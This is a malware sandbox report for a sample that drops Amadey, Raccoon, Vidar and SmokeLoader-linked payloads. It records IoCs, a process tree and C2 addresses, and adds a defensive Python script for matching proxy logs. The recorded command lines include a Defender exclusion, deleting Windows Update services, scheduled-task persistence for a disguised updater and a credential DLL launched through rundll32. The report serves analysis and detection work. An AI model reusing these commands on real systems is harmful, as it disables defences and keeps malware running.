Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT | conhost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | conhost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
-
Modifies registry class 25 IoCs
BagMRU and Bags are shellbag keys, written whenever a folder is viewed through the shell's browsing API; they record which directories Explorer.EXE and the rundll32.exe instances displayed and are useful for timelining what was opened, not as detection signals on their own.
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings | download.exe
Key created | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | rundll32.exe
Key created | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | rundll32.exe
Key created | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings | rundll32.exe
Key created | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | rundll32.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | rundll32.exe
Key created | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | rundll32.exe
Key created | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 | rundll32.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | rundll32.exe
Key created | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell | Explorer.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 | rundll32.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 | Explorer.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\NodeSlot = "2" | Explorer.EXE
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment. Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) is the default User-Agent of the WinHttpRequest COM object, which script hosts (VBScript/JScript, PowerShell via New-Object -ComObject) and some loaders use for HTTP; flows 8 and 25 are the ones to compare against the Amadey and Raccoon C2 addresses in Malware Config.
Processes:
description | flow | ioc
HTTP User-Agent header | 8 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 25 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
-
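Turning the Malware Config and Script User-Agent entries into a proxy-log check needs one caveat: the Vidar entries are pages on t.me and steamcommunity.com, so matching on the host alone would flag every Telegram and Steam user. The Python below is an added example, not code from the report or from any of the families' tooling: it matches the dedicated C2 addresses on host, the dead-drop resolvers on exact host and path, and the WinHttpRequest user-agent as a low-severity corroborating signal. The proxy log lines and their format are constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Indicators taken from the Malware Config and Script User-Agent sections of this report.
DEDICATED_C2 = {  # host -> family; any request to these hosts is a hit
    "77.73.134.27": "amadey",
    "94.131.3.70": "raccoon",
    "83.217.11.11": "raccoon",
    "83.217.11.13": "raccoon",
    "83.217.11.14": "raccoon",
    "45.15.156.222": "raccoon",
}
# Legitimate shared hosts: only the exact dead-drop path is an indicator.
DEAD_DROPS = {
    ("t.me", "/mantarlars"): "vidar",
    ("steamcommunity.com", "/profiles/76561199474840123"): "vidar",
}
SCRIPT_UA = "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"

# Constructed proxy log: <epoch> <client> <method> <url> "<user-agent>"
SAMPLE_LOG = """\
1675106001 10.0.0.15 POST http://77.73.134.27/8bmdh3Slb2/index.php "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
1675106002 10.0.0.15 GET https://steamcommunity.com/profiles/76561199474840123 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
1675106003 10.0.0.22 GET https://steamcommunity.com/app/730/ "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
1675106004 10.0.0.15 GET https://t.me/mantarlars "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
1675106005 10.0.0.15 POST http://94.131.3.70/ "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
1675106006 10.0.0.31 GET https://www.example.com/ "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
"""

_LINE = re.compile(r'^(\d+) (\S+) (\S+) (\S+) "([^"]*)"$')


def classify(line):
    """Return (client, url, findings); findings is a list of (label, severity)."""
    m = _LINE.match(line)
    if not m:
        return None
    _ts, client, _method, url, ua = m.groups()
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    path = parts.path.rstrip("/") or "/"          # normalise the trailing slash
    findings = []
    if host in DEDICATED_C2:
        findings.append((f"c2:{DEDICATED_C2[host]}", "high"))
    if (host, path) in DEAD_DROPS:
        findings.append((f"dead-drop:{DEAD_DROPS[(host, path)]}", "high"))
    if ua == SCRIPT_UA:
        # WinHttpRequest COM default UA: weak alone, corroborating next to a C2 hit
        findings.append(("script-ua", "low"))
    return client, url, findings


def scan_log(text):
    """Every log line that produced at least one finding."""
    return [r for r in map(classify, text.splitlines()) if r and r[2]]


def infected_clients(text):
    """Clients with at least one high-severity finding (UA-only matches are excluded)."""
    return sorted({client for client, _url, findings in scan_log(text)
                   if any(sev == "high" for _label, sev in findings)})


if __name__ == "__main__":
    for client, url, findings in scan_log(SAMPLE_LOG):
        print(client, url, findings)
    print("infected:", infected_clients(SAMPLE_LOG))
```

On the constructed log only 10.0.0.15 comes out as infected: 10.0.0.22 browsing a Steam store page on the same host is ignored, and 10.0.0.31 gets a low-severity note for the script user-agent alone, which on its own is not enough to act on.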
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
pid | process
676 | Explorer.EXE
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid | process
3028 | birge.exe (6 times)
4152 | ChromeSetup.exe (2 times)
676 | Explorer.EXE (2 times)
4216 | download.exe (2 times)
676 | Explorer.EXE (all remaining entries)
Explorer.EXE (PID 676) is the shell; clipboard listening, repeated process enumeration, GetForegroundWindow polling and SetWindowsHookEx use are not normal shell behaviour and suggest injected code running inside it. The visible tables do not show the injection itself (the MapViewOfSection use by the SmokeLoader-flagged ChromeSetup.exe is the nearest lead), so confirm it from the PID 676 memory dumps before relying on it.
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid | process
676 | Explorer.EXE
-
Suspicious behavior: LoadsDriver 1 IoCs
The report names no image for PID 656. The only driver file dropped in this run is C:\Program Files\Google\Libs\WR64.sys (see Drops file in Program Files directory).
Processes:
pid | process
656 |
-
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
pid | process
4152 | ChromeSetup.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Rows are grouped by process with a count; the original order was interleaved. powershell.exe 4776 enables its entire privilege set twice over (SeLoadDriverPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege and the unnamed LUIDs 33 to 36, which the sandbox did not resolve to names), which is what a SYSTEM-level script does when it calls AdjustTokenPrivileges for every privilege in its token. The four powercfg.exe runs (2076, 1780, 2660, 3172) are consistent with a miner installer changing power settings, but the report does not show their command lines.
Processes:
description | pid | process
Token: SeShutdownPrivilege | 676 | Explorer.EXE (6 times)
Token: SeCreatePagefilePrivilege | 676 | Explorer.EXE (6 times)
Token: SeDebugPrivilege | 3764 | powershell.exe
Token: SeDebugPrivilege | 4776 | powershell.exe
Token: SeShutdownPrivilege | 2076 | powercfg.exe
Token: SeCreatePagefilePrivilege | 2076 | powercfg.exe
Token: SeShutdownPrivilege | 1780 | powercfg.exe
Token: SeCreatePagefilePrivilege | 1780 | powercfg.exe
Token: SeShutdownPrivilege | 2660 | powercfg.exe
Token: SeCreatePagefilePrivilege | 2660 | powercfg.exe
Token: SeShutdownPrivilege | 3172 | powercfg.exe
Token: SeCreatePagefilePrivilege | 3172 | powercfg.exe
Token: SeIncreaseQuotaPrivilege | 4776 | powershell.exe (2 times)
Token: SeSecurityPrivilege | 4776 | powershell.exe (2 times)
Token: SeTakeOwnershipPrivilege | 4776 | powershell.exe (2 times)
Token: SeLoadDriverPrivilege | 4776 | powershell.exe (2 times)
Token: SeSystemProfilePrivilege | 4776 | powershell.exe (2 times)
Token: SeSystemtimePrivilege | 4776 | powershell.exe (2 times)
Token: SeProfSingleProcessPrivilege | 4776 | powershell.exe (2 times)
Token: SeIncBasePriorityPrivilege | 4776 | powershell.exe (2 times)
Token: SeCreatePagefilePrivilege | 4776 | powershell.exe (2 times)
Token: SeBackupPrivilege | 4776 | powershell.exe (2 times)
Token: SeRestorePrivilege | 4776 | powershell.exe (2 times)
Token: SeShutdownPrivilege | 4776 | powershell.exe (2 times)
Token: SeDebugPrivilege | 4776 | powershell.exe (2 times)
Token: SeSystemEnvironmentPrivilege | 4776 | powershell.exe (2 times)
Token: SeRemoteShutdownPrivilege | 4776 | powershell.exe (2 times)
Token: SeUndockPrivilege | 4776 | powershell.exe (2 times)
Token: SeManageVolumePrivilege | 4776 | powershell.exe (2 times)
Token: 33 | 4776 | powershell.exe (2 times)
Token: 34 | 4776 | powershell.exe (2 times)
Token: 35 | 4776 | powershell.exe (2 times)
Token: 36 | 4776 | powershell.exe (2 times)
-
Suspicious use of FindShellTrayWindow 1 IoCs
PID 3892 is the rundll32.exe whose thread context was set by PID 2384 (see Suspicious use of SetThreadContext), so this call comes from the injected code rather than from rundll32.exe itself.
Processes:
pid | process
3892 | rundll32.exe
-
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
pid | process
676 | Explorer.EXE
676 | Explorer.EXE
-
Suspicious use of WriteProcessMemory 64 IoCs
Each child appears two or three times because the sandbox records the parent's start-up writes into a process it has just created, so this table is effectively the process tree. Repeated rows are collapsed with a count, and the list is cut off at 64 entries. Reading it: the submitted sample (4268) starts Player3.exe, pb1111.exe, slwang.exe and birge.exe; Player3.exe starts nbveek.exe (1412), which creates the scheduled task and runs cmd.exe with four cacls.exe calls (consistent with the Amadey loader's routine of restricting permissions on its own directory) before starting pb1111.exe, random.exe, XandETC.exe, ChromeSetup.exe and download.exe. The two rundll32.exe parents (4420, 4520) are the instances spawned by WmiPrvSE.exe (see Process spawned unexpected child process).
Processes:
description | pid | process | target process
PID 4268 wrote to memory of 592 | 4268 | 2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe | Player3.exe (3 times)
PID 4268 wrote to memory of 932 | 4268 | 2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe | pb1111.exe (2 times)
PID 4268 wrote to memory of 1260 | 4268 | 2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe | slwang.exe (3 times)
PID 592 wrote to memory of 1412 | 592 | Player3.exe | nbveek.exe (3 times)
PID 4268 wrote to memory of 3028 | 4268 | 2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe | birge.exe (3 times)
PID 1412 wrote to memory of 204 | 1412 | nbveek.exe | schtasks.exe (3 times)
PID 1412 wrote to memory of 2996 | 1412 | nbveek.exe | cmd.exe (3 times)
PID 1260 wrote to memory of 1876 | 1260 | slwang.exe | slwang.exe (3 times)
PID 2996 wrote to memory of 3760 | 2996 | cmd.exe | cmd.exe (3 times)
PID 2996 wrote to memory of 3512 | 2996 | cmd.exe | cacls.exe (3 times)
PID 2996 wrote to memory of 1020 | 2996 | cmd.exe | cacls.exe (3 times)
PID 2996 wrote to memory of 4832 | 2996 | cmd.exe | cmd.exe (3 times)
PID 2996 wrote to memory of 2740 | 2996 | cmd.exe | cacls.exe (3 times)
PID 2996 wrote to memory of 2296 | 2996 | cmd.exe | cacls.exe (3 times)
PID 1412 wrote to memory of 4048 | 1412 | nbveek.exe | pb1111.exe (2 times)
PID 4420 wrote to memory of 4156 | 4420 | rundll32.exe | rundll32.exe (3 times)
PID 1412 wrote to memory of 3968 | 1412 | nbveek.exe | random.exe (3 times)
PID 3968 wrote to memory of 4608 | 3968 | random.exe | random.exe (3 times)
PID 1412 wrote to memory of 3436 | 1412 | nbveek.exe | XandETC.exe (2 times)
PID 4520 wrote to memory of 2900 | 4520 | rundll32.exe | rundll32.exe (3 times)
PID 1412 wrote to memory of 4152 | 1412 | nbveek.exe | ChromeSetup.exe (3 times)
PID 1412 wrote to memory of 4216 | 1412 | nbveek.exe | download.exe (3 times)
PID 1412 wrote to memory of 64 | 1412 | nbveek.exe | download.exe (1 time, list truncated)
Processes

Each entry shows the process image path with its tree depth in parentheses, then the recorded command line and the behaviours the sandbox flagged for that process.

(1) C:\Windows\Explorer.EXE
    cmdline: C:\Windows\Explorer.EXE
    - Modifies Internet Explorer settings
    - Modifies registry class
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
  (2) C:\Users\Admin\AppData\Local\Temp\2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe
      cmdline: "C:\Users\Admin\AppData\Local\Temp\2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe"
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory
    (3) C:\Users\Admin\AppData\Local\Temp\Player3.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\Player3.exe"
        - Executes dropped EXE
        - Checks computer location settings
        - Suspicious use of WriteProcessMemory
      (4) C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
          cmdline: "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"
          - Executes dropped EXE
          - Checks computer location settings
          - Suspicious use of WriteProcessMemory
        (5) C:\Windows\SysWOW64\schtasks.exe
            cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
            - Creates scheduled task(s)
        (5) C:\Windows\SysWOW64\cmd.exe
            cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit
            - Suspicious use of WriteProcessMemory
          (6) C:\Windows\SysWOW64\cmd.exe
              cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          (6) C:\Windows\SysWOW64\cacls.exe
              cmdline: CACLS "nbveek.exe" /P "Admin:N"
          (6) C:\Windows\SysWOW64\cacls.exe
              cmdline: CACLS "..\16de06bfb4" /P "Admin:R" /E
          (6) C:\Windows\SysWOW64\cacls.exe
              cmdline: CACLS "..\16de06bfb4" /P "Admin:N"
          (6) C:\Windows\SysWOW64\cmd.exe
              cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          (6) C:\Windows\SysWOW64\cacls.exe
              cmdline: CACLS "nbveek.exe" /P "Admin:R" /E
        (5) C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe
            cmdline: "C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe"
            - Executes dropped EXE
        (5) C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe
            cmdline: "C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe"
            - Executes dropped EXE
            - Checks computer location settings
            - Suspicious use of WriteProcessMemory
          (6) C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe
              cmdline: "C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe" -h
              - Executes dropped EXE
        (5) C:\Users\Admin\AppData\Local\Temp\1000091001\XandETC.exe
            cmdline: "C:\Users\Admin\AppData\Local\Temp\1000091001\XandETC.exe"
            - Suspicious use of NtCreateUserProcessOtherParentProcess
            - Executes dropped EXE
            - Drops file in Program Files directory
        (5) C:\Users\Admin\AppData\Local\Temp\1000092001\ChromeSetup.exe
            cmdline: "C:\Users\Admin\AppData\Local\Temp\1000092001\ChromeSetup.exe"
            - Executes dropped EXE
            - Checks SCSI registry key(s)
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious behavior: MapViewOfSection
        (5) C:\Users\Admin\AppData\Local\Temp\1000097001\download.exe
            cmdline: "C:\Users\Admin\AppData\Local\Temp\1000097001\download.exe"
            - Executes dropped EXE
            - Checks computer location settings
            - Loads dropped DLL
            - Checks processor information in registry
            - Suspicious behavior: EnumeratesProcesses
          (6) C:\Windows\SysWOW64\cmd.exe
              cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1000097001\download.exe" & exit
            (7) C:\Windows\SysWOW64\timeout.exe
                cmdline: timeout /t 6
                - Delays execution with timeout.exe
          (6) C:\Windows\SysWOW64\WerFault.exe
              cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4216 -s 2004
              - Program crash
          (6) C:\Windows\SysWOW64\WerFault.exe
              cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4216 -s 1876
              - Program crash
        (5) C:\Users\Admin\AppData\Local\Temp\1000098001\download.exe
            cmdline: "C:\Users\Admin\AppData\Local\Temp\1000098001\download.exe"
            - Executes dropped EXE
            - Modifies registry class
        (5) C:\Windows\SysWOW64\rundll32.exe
            cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
            - Loads dropped DLL
          (6) C:\Windows\system32\rundll32.exe
              cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
              - Loads dropped DLL
            (7) C:\Windows\system32\WerFault.exe
                cmdline: C:\Windows\system32\WerFault.exe -u -p 3784 -s 688
                - Program crash
    (3) C:\Users\Admin\AppData\Local\Temp\pb1111.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\pb1111.exe"
        - Executes dropped EXE
    (3) C:\Users\Admin\AppData\Local\Temp\slwang.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\slwang.exe"
        - Executes dropped EXE
        - Checks computer location settings
        - Suspicious use of WriteProcessMemory
      (4) C:\Users\Admin\AppData\Local\Temp\slwang.exe
          cmdline: "C:\Users\Admin\AppData\Local\Temp\slwang.exe" -h
          - Executes dropped EXE
    (3) C:\Users\Admin\AppData\Local\Temp\birge.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\birge.exe"
        - Identifies VirtualBox via ACPI registry values (likely anti-VM)
        - Executes dropped EXE
        - Checks BIOS information in registry
        - Checks whether UAC is enabled
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious behavior: EnumeratesProcesses
  (2) C:\Users\Admin\AppData\Local\Temp\36A0.exe
      cmdline: C:\Users\Admin\AppData\Local\Temp\36A0.exe
      - Executes dropped EXE
    (3) C:\Windows\SysWOW64\rundll32.exe
        cmdline: C:\Windows\system32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\Eorppuwwrieiyod.dll,start
        - Blocklisted process makes network request
        - Loads dropped DLL
        - Suspicious use of SetThreadContext
        - Checks processor information in registry
      (4) C:\Windows\system32\rundll32.exe
          cmdline: "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61 23751
          - Modifies registry class
          - Suspicious use of FindShellTrayWindow
    (3) C:\Windows\SysWOW64\WerFault.exe
        cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 520 -s 400
        - Program crash
  (2) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Suspicious use of AdjustPrivilegeToken
  (2) C:\Windows\System32\cmd.exe
      cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    (3) C:\Windows\System32\sc.exe
        cmdline: sc stop UsoSvc
        - Launches sc.exe
    (3) C:\Windows\System32\sc.exe
        cmdline: sc stop WaaSMedicSvc
        - Launches sc.exe
    (3) C:\Windows\System32\sc.exe
        cmdline: sc stop wuauserv
        - Launches sc.exe
    (3) C:\Windows\System32\sc.exe
        cmdline: sc stop bits
        - Launches sc.exe
    (3) C:\Windows\System32\sc.exe
        cmdline: sc stop dosvc
        - Launches sc.exe
    (3) C:\Windows\System32\reg.exe
        cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    (3) C:\Windows\System32\reg.exe
        cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    (3) C:\Windows\System32\reg.exe
        cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        - Modifies security service
    (3) C:\Windows\System32\reg.exe
        cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    (3) C:\Windows\System32\reg.exe
        cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  (2) C:\Windows\System32\cmd.exe
      cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    (3) C:\Windows\System32\powercfg.exe
        cmdline: powercfg /x -hibernate-timeout-ac 0
        - Suspicious use of AdjustPrivilegeToken
    (3) C:\Windows\System32\powercfg.exe
        cmdline: powercfg /x -hibernate-timeout-dc 0
        - Suspicious use of AdjustPrivilegeToken
    (3) C:\Windows\System32\powercfg.exe
        cmdline: powercfg /x -standby-timeout-ac 0
        - Suspicious use of AdjustPrivilegeToken
    (3) C:\Windows\System32\powercfg.exe
        cmdline: powercfg /x -standby-timeout-dc 0
        - Suspicious use of AdjustPrivilegeToken
  (2) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
      - Suspicious use of AdjustPrivilegeToken
  (2) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
